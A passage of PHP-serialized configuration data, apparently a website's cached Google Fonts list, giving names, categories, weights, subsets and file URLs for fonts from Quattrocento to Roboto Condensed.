2r7iU.ttf";i:700;s:90:"http://fonts.gstatic.com/s/quattrocento/v8/Uvi-cRwyvqFpl9j3oT2mqkD2ttfZwueP-QU272T9-k4.ttf";}s:4:"urls";a:2:{s:7:"regular";s:60:"https://fonts.googleapis.com/css?family=Quattrocento:regular";i:700;s:56:"https://fonts.googleapis.com/css?family=Quattrocento:700";}}s:17:"quattrocento_sans";a:7:{s:4:"name";s:17:"Quattrocento Sans";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:4:{i:0;s:7:"regular";i:1;s:6:"italic";i:2;s:3:"700";i:3;s:9:"700italic";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:4:{s:7:"regular";s:94:"http://fonts.gstatic.com/s/quattrocentosans/v9/efd6FGWWGX5Z3ztwLBrG9eAj_ty82iuwwDTNEYXGiyQ.ttf";s:6:"italic";s:94:"http://fonts.gstatic.com/s/quattrocentosans/v9/8PXYbvM__bjl0rBnKiByg532VBCoA_HLsn85tSWZmdo.ttf";i:700;s:94:"http://fonts.gstatic.com/s/quattrocentosans/v9/tXSgPxDl7Lk8Zr_5qX8FIbqxG25nQNOioCZSK4sU-CA.ttf";s:9:"700italic";s:94:"http://fonts.gstatic.com/s/quattrocentosans/v9/8N1PdXpbG6RtFvTjl-5E7buqAJxizi8Dk_SK5et7kMg.ttf";}s:4:"urls";a:4:{s:7:"regular";s:65:"https://fonts.googleapis.com/css?family=Quattrocento+Sans:regular";s:6:"italic";s:64:"https://fonts.googleapis.com/css?family=Quattrocento+Sans:italic";i:700;s:61:"https://fonts.googleapis.com/css?family=Quattrocento+Sans:700";s:9:"700italic";s:67:"https://fonts.googleapis.com/css?family=Quattrocento+Sans:700italic";}}s:9:"questrial";a:7:{s:4:"name";s:9:"Questrial";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:66:"http://fonts.gstatic.com/s/questrial/v6/MoHHaw_WwNs_hd9ob1zTVw.ttf";}s:4:"urls";a:1:{s:7:"regular";s:57:"https://fonts.googleapis.com/css?family=Questrial:regular";}}s:9:"quicksand";a:7:{s:4:"name";s:9:"Quicksand";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:3:{i:0;s:3:"300";i:1;s:7:"regular";i:2;s:3:"700";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:3:{i:300;s:87:"http://fonts.gstatic.com/s/quicksand/v5/qhfoJiLu10kFjChCCTvGlC3USBnSvpkopQaUR-2r7iU.ttf";s:7:"regular";s:66:"http://fonts.gstatic.com/s/quicksand/v5/Ngv3fIJjKB7sD-bTUGIFCA.ttf";i:700;s:87:"http://fonts.gstatic.com/s/quicksand/v5/32nyIRHyCu6iqEka_hbKsi3USBnSvpkopQaUR-2r7iU.ttf";}s:4:"urls";a:3:{i:300;s:53:"https://fonts.googleapis.com/css?family=Quicksand:300";s:7:"regular";s:57:"https://fonts.googleapis.com/css?family=Quicksand:regular";i:700;s:53:"https://fonts.googleapis.com/css?family=Quicksand:700";}}s:14:"quintessential";a:7:{s:4:"name";s:14:"Quintessential";s:8:"category";s:11:"handwriting";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:92:"http://fonts.gstatic.com/s/quintessential/v4/mmk6ioesnTrEky_Zb92E5s02lXbtMOtZWfuxKeMZO8Q.ttf";}s:4:"urls";a:1:{s:7:"regular";s:62:"https://fonts.googleapis.com/css?family=Quintessential:regular";}}s:7:"qwigley";a:7:{s:4:"name";s:7:"Qwigley";s:8:"category";s:11:"handwriting";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:64:"http://fonts.gstatic.com/s/qwigley/v6/aDqxws-KubFID85TZHFouw.ttf";}s:4:"urls";a:1:{s:7:"regular";s:55:"https://fonts.googleapis.com/css?family=Qwigley:regular";}}s:15:"racing_sans_one";a:7:{s:4:"name";s:15:"Racing Sans One";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:91:"http://fonts.gstatic.com/s/racingsansone/v4/1r3DpWaCiT7y3PD4KgkNyDjVlsJB_M_Q_LtZxsoxvlw.ttf";}s:4:"urls";a:1:{s:7:"regular";s:63:"https://fonts.googleapis.com/css?family=Racing+Sans+One:regular";}}s:6:"radley";a:7:{s:4:"name";s:6:"Radley";s:8:"category";s:5:"serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:2:{i:0;s:7:"regular";i:1;s:6:"italic";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:2:{s:7:"regular";s:63:"http://fonts.gstatic.com/s/radley/v9/FgE9di09a-mXGzAIyI6Q9Q.ttf";s:6:"italic";s:63:"http://fonts.gstatic.com/s/radley/v9/Z_JcACuPAOO2f9kzQcGRug.ttf";}s:4:"urls";a:2:{s:7:"regular";s:54:"https://fonts.googleapis.com/css?family=Radley:regular";s:6:"italic";s:53:"https://fonts.googleapis.com/css?family=Radley:italic";}}s:8:"rajdhani";a:7:{s:4:"name";s:8:"Rajdhani";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:5:{i:0;s:3:"300";i:1;s:7:"regular";i:2;s:3:"500";i:3;s:3:"600";i:4;s:3:"700";}s:7:"subsets";a:3:{i:0;s:5:"latin";i:1;s:9:"latin-ext";i:2;s:10:"devanagari";}s:5:"files";a:5:{i:300;s:86:"http://fonts.gstatic.com/s/rajdhani/v5/9pItuEhQZVGdq8spnHTku6CWcynf_cDxXwCLxiixG1c.ttf";s:7:"regular";s:65:"http://fonts.gstatic.com/s/rajdhani/v5/Wfy5zp4PGFAFS7-Wetehzw.ttf";i:500;s:86:"http://fonts.gstatic.com/s/rajdhani/v5/nd_5ZpVwm710HcLual0fBqCWcynf_cDxXwCLxiixG1c.ttf";i:600;s:86:"http://fonts.gstatic.com/s/rajdhani/v5/5fnmZahByDeTtgxIiqbJSaCWcynf_cDxXwCLxiixG1c.ttf";i:700;s:86:"http://fonts.gstatic.com/s/rajdhani/v5/UBK6d2Hg7X7wYLlF92aXW6CWcynf_cDxXwCLxiixG1c.ttf";}s:4:"urls";a:5:{i:300;s:52:"https://fonts.googleapis.com/css?family=Rajdhani:300";s:7:"regular";s:56:"https://fonts.googleapis.com/css?family=Rajdhani:regular";i:500;s:52:"https://fonts.googleapis.com/css?family=Rajdhani:500";i:600;s:52:"https://fonts.googleapis.com/css?family=Rajdhani:600";i:700;s:52:"https://fonts.googleapis.com/css?family=Rajdhani:700";}}s:6:"rakkas";a:7:{s:4:"name";s:6:"Rakkas";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:3:{i:0;s:6:"arabic";i:1;s:5:"latin";i:2;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:63:"http://fonts.gstatic.com/s/rakkas/v1/XWSZpoSbAR4myQgKbSJM9A.ttf";}s:4:"urls";a:1:{s:7:"regular";s:54:"https://fonts.googleapis.com/css?family=Rakkas:regular";}}s:7:"raleway";a:7:{s:4:"name";s:7:"Raleway";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:18:{i:0;s:3:"100";i:1;s:9:"100italic";i:2;s:3:"200";i:3;s:9:"200italic";i:4;s:3:"300";i:5;s:9:"300italic";i:6;s:7:"regular";i:7;s:6:"italic";i:8;s:3:"500";i:9;s:9:"500italic";i:10;s:3:"600";i:11;s:9:"600italic";i:12;s:3:"700";i:13;s:9:"700italic";i:14;s:3:"800";i:15;s:9:"800italic";i:16;s:3:"900";i:17;s:9:"900italic";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:18:{i:100;s:65:"http://fonts.gstatic.com/s/raleway/v11/UDfD6oxBaBnmFJwQ7XAFNw.ttf";s:9:"100italic";s:86:"http://fonts.gstatic.com/s/raleway/v11/hUpHtml6IPNuUR-FwVi2UKCWcynf_cDxXwCLxiixG1c.ttf";i:200;s:86:"http://fonts.gstatic.com/s/raleway/v11/LAQwev4hdCtYkOYX4Oc7nPesZW2xOQ-xsNqO47m55DA.ttf";s:9:"200italic";s:86:"http://fonts.gstatic.com/s/raleway/v11/N2DIbZG4399cPGfifZUEQi3USBnSvpkopQaUR-2r7iU.ttf";i:300;s:86:"http://fonts.gstatic.com/s/raleway/v11/2VvSZU2kb4DZwFfRM4fLQPesZW2xOQ-xsNqO47m55DA.ttf";s:9:"300italic";s:86:"http://fonts.gstatic.com/s/raleway/v11/TVSB8ogXDKMcnAAJ5CqrUi3USBnSvpkopQaUR-2r7iU.ttf";s:7:"regular";s:65:"http://fonts.gstatic.com/s/raleway/v11/_dCzxpXzIS3sL-gdJWAP8A.ttf";s:6:"italic";s:65:"http://fonts.gstatic.com/s/raleway/v11/utU2m1gdZSfuQpArSy5Dbw.ttf";i:500;s:86:"http://fonts.gstatic.com/s/raleway/v11/348gn6PEmbLDWlHbbV15d_esZW2xOQ-xsNqO47m55DA.ttf";s:9:"500italic";s:86:"http://fonts.gstatic.com/s/raleway/v11/S7vGLZZ40c85SJgiptJGVy3USBnSvpkopQaUR-2r7iU.ttf";i:600;s:86:"http://fonts.gstatic.com/s/raleway/v11/M7no6oPkwKYJkedjB1wqEvesZW2xOQ-xsNqO47m55DA.ttf";s:9:"600italic";s:86:"http://fonts.gstatic.com/s/raleway/v11/OY22yoG8EJ3IN_muVWm29C3USBnSvpkopQaUR-2r7iU.ttf";i:700;s:86:"http://fonts.gstatic.com/s/raleway/v11/VGEV9-DrblisWOWLbK-1XPesZW2xOQ-xsNqO47m55DA.ttf";s:9:"700italic";s:86:"http://fonts.gstatic.com/s/raleway/v11/lFxvRPuGFG5ktd7P0WRwKi3USBnSvpkopQaUR-2r7iU.ttf";i:800;s:86:"http://fonts.gstatic.com/s/raleway/v11/mMh0JrsYMXcLO69jgJwpUvesZW2xOQ-xsNqO47m55DA.ttf";s:9:"800italic";s:86:"http://fonts.gstatic.com/s/raleway/v11/us4LjTCmlYgh3W8CKujEJi3USBnSvpkopQaUR-2r7iU.ttf";i:900;s:86:"http://fonts.gstatic.com/s/raleway/v11/ajQQGcDBLcyLpaUfD76UuPesZW2xOQ-xsNqO47m55DA.ttf";s:9:"900italic";s:86:"http://fonts.gstatic.com/s/raleway/v11/oY2RadnkHfshu5f0FLsgVS3USBnSvpkopQaUR-2r7iU.ttf";}s:4:"urls";a:18:{i:100;s:51:"https://fonts.googleapis.com/css?family=Raleway:100";s:9:"100italic";s:57:"https://fonts.googleapis.com/css?family=Raleway:100italic";i:200;s:51:"https://fonts.googleapis.com/css?family=Raleway:200";s:9:"200italic";s:57:"https://fonts.googleapis.com/css?family=Raleway:200italic";i:300;s:51:"https://fonts.googleapis.com/css?family=Raleway:300";s:9:"300italic";s:57:"https://fonts.googleapis.com/css?family=Raleway:300italic";s:7:"regular";s:55:"https://fonts.googleapis.com/css?family=Raleway:regular";s:6:"italic";s:54:"https://fonts.googleapis.com/css?family=Raleway:italic";i:500;s:51:"https://fonts.googleapis.com/css?family=Raleway:500";s:9:"500italic";s:57:"https://fonts.googleapis.com/css?family=Raleway:500italic";i:600;s:51:"https://fonts.googleapis.com/css?family=Raleway:600";s:9:"600italic";s:57:"https://fonts.googleapis.com/css?family=Raleway:600italic";i:700;s:51:"https://fonts.googleapis.com/css?family=Raleway:700";s:9:"700italic";s:57:"https://fonts.googleapis.com/css?family=Raleway:700italic";i:800;s:51:"https://fonts.googleapis.com/css?family=Raleway:800";s:9:"800italic";s:57:"https://fonts.googleapis.com/css?family=Raleway:800italic";i:900;s:51:"https://fonts.googleapis.com/css?family=Raleway:900";s:9:"900italic";s:57:"https://fonts.googleapis.com/css?family=Raleway:900italic";}}s:12:"raleway_dots";a:7:{s:4:"name";s:12:"Raleway Dots";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:89:"http://fonts.gstatic.com/s/ralewaydots/v4/lhLgmWCRcyz-QXo8LCzTfC3USBnSvpkopQaUR-2r7iU.ttf";}s:4:"urls";a:1:{s:7:"regular";s:60:"https://fonts.googleapis.com/css?family=Raleway+Dots:regular";}}s:10:"ramabhadra";a:7:{s:4:"name";s:10:"Ramabhadra";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:6:"telugu";}s:5:"files";a:1:{s:7:"regular";s:88:"http://fonts.gstatic.com/s/ramabhadra/v5/JyhxLXRVQChLDGADS_c5MPesZW2xOQ-xsNqO47m55DA.ttf";}s:4:"urls";a:1:{s:7:"regular";s:58:"https://fonts.googleapis.com/css?family=Ramabhadra:regular";}}s:8:"ramaraja";a:7:{s:4:"name";s:8:"Ramaraja";s:8:"category";s:5:"serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:6:"telugu";}s:5:"files";a:1:{s:7:"regular";s:65:"http://fonts.gstatic.com/s/ramaraja/v1/XIqzxFapVczstBedHdQTiw.ttf";}s:4:"urls";a:1:{s:7:"regular";s:56:"https://fonts.googleapis.com/css?family=Ramaraja:regular";}}s:6:"rambla";a:7:{s:4:"name";s:6:"Rambla";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:4:{i:0;s:7:"regular";i:1;s:6:"italic";i:2;s:3:"700";i:3;s:9:"700italic";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:4:{s:7:"regular";s:63:"http://fonts.gstatic.com/s/rambla/v4/YaTmpvm5gFg_ShJKTQmdzg.ttf";s:6:"italic";s:63:"http://fonts.gstatic.com/s/rambla/v4/mhUgsKmp0qw3uATdDDAuwA.ttf";i:700;s:63:"http://fonts.gstatic.com/s/rambla/v4/C5VZH8BxQKmnBuoC00UPpw.ttf";s:9:"700italic";s:84:"http://fonts.gstatic.com/s/rambla/v4/ziMzUZya6QahrKONSI1TzqCWcynf_cDxXwCLxiixG1c.ttf";}s:4:"urls";a:4:{s:7:"regular";s:54:"https://fonts.googleapis.com/css?family=Rambla:regular";s:6:"italic";s:53:"https://fonts.googleapis.com/css?family=Rambla:italic";i:700;s:50:"https://fonts.googleapis.com/css?family=Rambla:700";s:9:"700italic";s:56:"https://fonts.googleapis.com/css?family=Rambla:700italic";}}s:12:"rammetto_one";a:7:{s:4:"name";s:12:"Rammetto One";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:89:"http://fonts.gstatic.com/s/rammettoone/v5/mh0uQ1tV8QgSx9v_KyEYPC3USBnSvpkopQaUR-2r7iU.ttf";}s:4:"urls";a:1:{s:7:"regular";s:60:"https://fonts.googleapis.com/css?family=Rammetto+One:regular";}}s:8:"ranchers";a:7:{s:4:"name";s:8:"Ranchers";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:65:"http://fonts.gstatic.com/s/ranchers/v4/9ya8CZYhqT66VERfjQ7eLA.ttf";}s:4:"urls";a:1:{s:7:"regular";s:56:"https://fonts.googleapis.com/css?family=Ranchers:regular";}}s:6:"rancho";a:7:{s:4:"name";s:6:"Rancho";s:8:"category";s:11:"handwriting";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:63:"http://fonts.gstatic.com/s/rancho/v6/ekp3-4QykC4--6KaslRgHA.ttf";}s:4:"urls";a:1:{s:7:"regular";s:54:"https://fonts.googleapis.com/css?family=Rancho:regular";}}s:5:"ranga";a:7:{s:4:"name";s:5:"Ranga";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:2:{i:0;s:7:"regular";i:1;s:3:"700";}s:7:"subsets";a:3:{i:0;s:5:"latin";i:1;s:9:"latin-ext";i:2;s:10:"devanagari";}s:5:"files";a:2:{s:7:"regular";s:62:"http://fonts.gstatic.com/s/ranga/v1/xpW6zFTNzY1JykoBIqE1Zg.ttf";i:700;s:62:"http://fonts.gstatic.com/s/ranga/v1/h8G_gEUH7vHKH-NkjAs34A.ttf";}s:4:"urls";a:2:{s:7:"regular";s:53:"https://fonts.googleapis.com/css?family=Ranga:regular";i:700;s:49:"https://fonts.googleapis.com/css?family=Ranga:700";}}s:4:"rasa";a:7:{s:4:"name";s:4:"Rasa";s:8:"category";s:5:"serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:5:{i:0;s:3:"300";i:1;s:7:"regular";i:2;s:3:"500";i:3;s:3:"600";i:4;s:3:"700";}s:7:"subsets";a:3:{i:0;s:5:"latin";i:1;s:8:"gujarati";i:2;s:9:"latin-ext";}s:5:"files";a:5:{i:300;s:61:"http://fonts.gstatic.com/s/rasa/v1/XQ1gDq2EqBtGcdadPyPbww.ttf";s:7:"regular";s:61:"http://fonts.gstatic.com/s/rasa/v1/A5PoJUwX_PxTsywxlRB79g.ttf";i:500;s:61:"http://fonts.gstatic.com/s/rasa/v1/HfsDi_Ls3NARO_YEODINGg.ttf";i:600;s:61:"http://fonts.gstatic.com/s/rasa/v1/f-fvbq-hWIQCdmT3QHGk3Q.ttf";i:700;s:61:"http://fonts.gstatic.com/s/rasa/v1/TSF3CG-8Cn72jvaVdqtMMQ.ttf";}s:4:"urls";a:5:{i:300;s:48:"https://fonts.googleapis.com/css?family=Rasa:300";s:7:"regular";s:52:"https://fonts.googleapis.com/css?family=Rasa:regular";i:500;s:48:"https://fonts.googleapis.com/css?family=Rasa:500";i:600;s:48:"https://fonts.googleapis.com/css?family=Rasa:600";i:700;s:48:"https://fonts.googleapis.com/css?family=Rasa:700";}}s:9:"rationale";a:7:{s:4:"name";s:9:"Rationale";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:66:"http://fonts.gstatic.com/s/rationale/v7/7M2eN-di0NGLQse7HzJRfg.ttf";}s:4:"urls";a:1:{s:7:"regular";s:57:"https://fonts.googleapis.com/css?family=Rationale:regular";}}s:12:"ravi_prakash";a:7:{s:4:"name";s:12:"Ravi Prakash";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:6:"telugu";}s:5:"files";a:1:{s:7:"regular";s:89:"http://fonts.gstatic.com/s/raviprakash/v3/8EzbM7Rymjk25jWeHxbO6C3USBnSvpkopQaUR-2r7iU.ttf";}s:4:"urls";a:1:{s:7:"regular";s:60:"https://fonts.googleapis.com/css?family=Ravi+Prakash:regular";}}s:9:"redressed";a:7:{s:4:"name";s:9:"Redressed";s:8:"category";s:11:"handwriting";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:66:"http://fonts.gstatic.com/s/redressed/v6/3aZ5sTBppH3oSm5SabegtA.ttf";}s:4:"urls";a:1:{s:7:"regular";s:57:"https://fonts.googleapis.com/css?family=Redressed:regular";}}s:9:"reem_kufi";a:7:{s:4:"name";s:9:"Reem Kufi";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:6:"arabic";i:1;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:65:"http://fonts.gstatic.com/s/reemkufi/v1/xLwMbK_T1g-h9p-rp60A1Q.ttf";}s:4:"urls";a:1:{s:7:"regular";s:57:"https://fonts.googleapis.com/css?family=Reem+Kufi:regular";}}s:13:"reenie_beanie";a:7:{s:4:"name";s:13:"Reenie Beanie";s:8:"category";s:11:"handwriting";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:90:"http://fonts.gstatic.com/s/reeniebeanie/v7/ljpKc6CdXusL1cnGUSamX4jjx0o0jr6fNXxPgYh_a8Q.ttf";}s:4:"urls";a:1:{s:7:"regular";s:61:"https://fonts.googleapis.com/css?family=Reenie+Beanie:regular";}}s:7:"revalia";a:7:{s:4:"name";s:7:"Revalia";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:64:"http://fonts.gstatic.com/s/revalia/v4/1TKw66fF5_poiL0Ktgo4_A.ttf";}s:4:"urls";a:1:{s:7:"regular";s:55:"https://fonts.googleapis.com/css?family=Revalia:regular";}}s:13:"rhodium_libre";a:7:{s:4:"name";s:13:"Rhodium Libre";s:8:"category";s:5:"serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:3:{i:0;s:5:"latin";i:1;s:9:"latin-ext";i:2;s:10:"devanagari";}s:5:"files";a:1:{s:7:"regular";s:90:"http://fonts.gstatic.com/s/rhodiumlibre/v1/Vxr7A4-xE2zsBDDI8BcseIjjx0o0jr6fNXxPgYh_a8Q.ttf";}s:4:"urls";a:1:{s:7:"regular";s:61:"https://fonts.googleapis.com/css?family=Rhodium+Libre:regular";}}s:6:"ribeye";a:7:{s:4:"name";s:6:"Ribeye";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:63:"http://fonts.gstatic.com/s/ribeye/v5/e5w3VE8HnWBln4Ll6lUj3Q.ttf";}s:4:"urls";a:1:{s:7:"regular";s:54:"https://fonts.googleapis.com/css?family=Ribeye:regular";}}s:13:"ribeye_marrow";a:7:{s:4:"name";s:13:"Ribeye Marrow";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:90:"http://fonts.gstatic.com/s/ribeyemarrow/v6/q7cBSA-4ErAXBCDFPrhlY0cTNmV93fYG7UKgsLQNQWs.ttf";}s:4:"urls";a:1:{s:7:"regular";s:61:"https://fonts.googleapis.com/css?family=Ribeye+Marrow:regular";}}s:9:"righteous";a:7:{s:4:"name";s:9:"Righteous";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:66:"http://fonts.gstatic.com/s/righteous/v5/0nRRWM_gCGCt2S-BCfN8WQ.ttf";}s:4:"urls";a:1:{s:7:"regular";s:57:"https://fonts.googleapis.com/css?family=Righteous:regular";}}s:6:"risque";a:7:{s:4:"name";s:6:"Risque";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:63:"http://fonts.gstatic.com/s/risque/v4/92RnElGnl8yHP97-KV3Fyg.ttf";}s:4:"urls";a:1:{s:7:"regular";s:54:"https://fonts.googleapis.com/css?family=Risque:regular";}}s:6:"roboto";a:7:{s:4:"name";s:6:"Roboto";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:12:{i:0;s:3:"100";i:1;s:9:"100italic";i:2;s:3:"300";i:3;s:9:"300italic";i:4;s:7:"regular";i:5;s:6:"italic";i:6;s:3:"500";i:7;s:9:"500italic";i:8;s:3:"700";i:9;s:9:"700italic";i:10;s:3:"900";i:11;s:9:"900italic";}s:7:"subsets";a:7:{i:0;s:5:"latin";i:1;s:5:"greek";i:2;s:9:"greek-ext";i:3;s:10:"vietnamese";i:4;s:12:"cyrillic-ext";i:5;s:9:"latin-ext";i:6;s:8:"cyrillic";}s:5:"files";a:12:{i:100;s:64:"http://fonts.gstatic.com/s/roboto/v15/7MygqTe2zs9YkP0adA9QQQ.ttf";s:9:"100italic";s:85:"http://fonts.gstatic.com/s/roboto/v15/T1xnudodhcgwXCmZQ490TPesZW2xOQ-xsNqO47m55DA.ttf";i:300;s:64:"http://fonts.gstatic.com/s/roboto/v15/dtpHsbgPEm2lVWciJZ0P-A.ttf";s:9:"300italic";s:85:"http://fonts.gstatic.com/s/roboto/v15/iE8HhaRzdhPxC93dOdA056CWcynf_cDxXwCLxiixG1c.ttf";s:7:"regular";s:64:"http://fonts.gstatic.com/s/roboto/v15/W5F8_SL0XFawnjxHGsZjJA.ttf";s:6:"italic";s:64:"http://fonts.gstatic.com/s/roboto/v15/hcKoSgxdnKlbH5dlTwKbow.ttf";i:500;s:64:"http://fonts.gstatic.com/s/roboto/v15/Uxzkqj-MIMWle-XP2pDNAA.ttf";s:9:"500italic";s:85:"http://fonts.gstatic.com/s/roboto/v15/daIfzbEw-lbjMyv4rMUUTqCWcynf_cDxXwCLxiixG1c.ttf";i:700;s:64:"http://fonts.gstatic.com/s/roboto/v15/bdHGHleUa-ndQCOrdpfxfw.ttf";s:9:"700italic";s:85:"http://fonts.gstatic.com/s/roboto/v15/owYYXKukxFDFjr0ZO8NXh6CWcynf_cDxXwCLxiixG1c.ttf";i:900;s:64:"http://fonts.gstatic.com/s/roboto/v15/H1vB34nOKWXqzKotq25pcg.ttf";s:9:"900italic";s:85:"http://fonts.gstatic.com/s/roboto/v15/b9PWBSMHrT2zM5FgUdtu0aCWcynf_cDxXwCLxiixG1c.ttf";}s:4:"urls";a:12:{i:100;s:50:"https://fonts.googleapis.com/css?family=Roboto:100";s:9:"100italic";s:56:"https://fonts.googleapis.com/css?family=Roboto:100italic";i:300;s:50:"https://fonts.googleapis.com/css?family=Roboto:300";s:9:"300italic";s:56:"https://fonts.googleapis.com/css?family=Roboto:300italic";s:7:"regular";s:54:"https://fonts.googleapis.com/css?family=Roboto:regular";s:6:"italic";s:53:"https://fonts.googleapis.com/css?family=Roboto:italic";i:500;s:50:"https://fonts.googleapis.com/css?family=Roboto:500";s:9:"500italic";s:56:"https://fonts.googleapis.com/css?family=Roboto:500italic";i:700;s:50:"https://fonts.googleapis.com/css?family=Roboto:700";s:9:"700italic";s:56:"https://fonts.googleapis.com/css?family=Roboto:700italic";i:900;s:50:"https://fonts.googleapis.com/css?family=Roboto:900";s:9:"900italic";s:56:"https://fonts.googleapis.com/css?family=Roboto:900italic";}}s:16:"roboto_condensed";a:7:{s:4:"name";s:16:"Roboto Condensed";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:6:{i:0;s:3:"300";i:1;s:9:"300italic";i:2;s:7:"regular";i:3;s:6:"italic";i:4;s:3:"700";i:5;s:9:"700italic";}s:7:"subsets";a:7:{i:0;s:5:"latin";i:1;s:5:"greek";i:2;s:9:"greek-ext";i:3;s:10:"vietnamese";i:4;s:12:"cyrillic-ext";i:5;s:9:"latin-ext";i:6;s:8:"cyrillic";}s:5:"files";a:6:{i:300;s:94:"http://fonts.gstatic.com/s/robotocondensed/v13/b9QBgL0iMZfDSpmcXcE8nJRhFVcex_hajThhFkHyhYk.ttf";s:9:"300italic";s:94:"http://fonts.gstatic.com/s/robotocondensed/v13/mg0cGfGRUERshzBlvqxeAPYa9bgCHecWXGgisnodcS0.ttf";s:7:"regular";s:94:"http://fonts.gstatic.com/s/robotocondensed/v13/Zd2E9abXLFGSr9G3YK2MsKDbm6fPDOZJsR8PmdG62gY.ttf";s:6:"italic";s:94:"http://fonts.gstatic.com/s/robotocondensed/v13/BP5K8ZAJv9qEbmuFp8RpJY_eiqgTfYGaH0bJiUDZ5GA.ttf";i:700;s:94:"http://fonts.gstatic.com/s/robotocondensed/v13/b9QBgL0iMZfDSpmcXcE8nPOYkGiSOYDq_T7HbIOV1hA.ttf";s:9:"700italic";s:94:"http://fonts.gstatic.com/s/robotocondensed/v13/mg0cGfGRUERshzBlvqxeAE2zk2RGRC3SlyyLLQfjS_8.ttf";}s:4:"urls";a:6:{i:300;s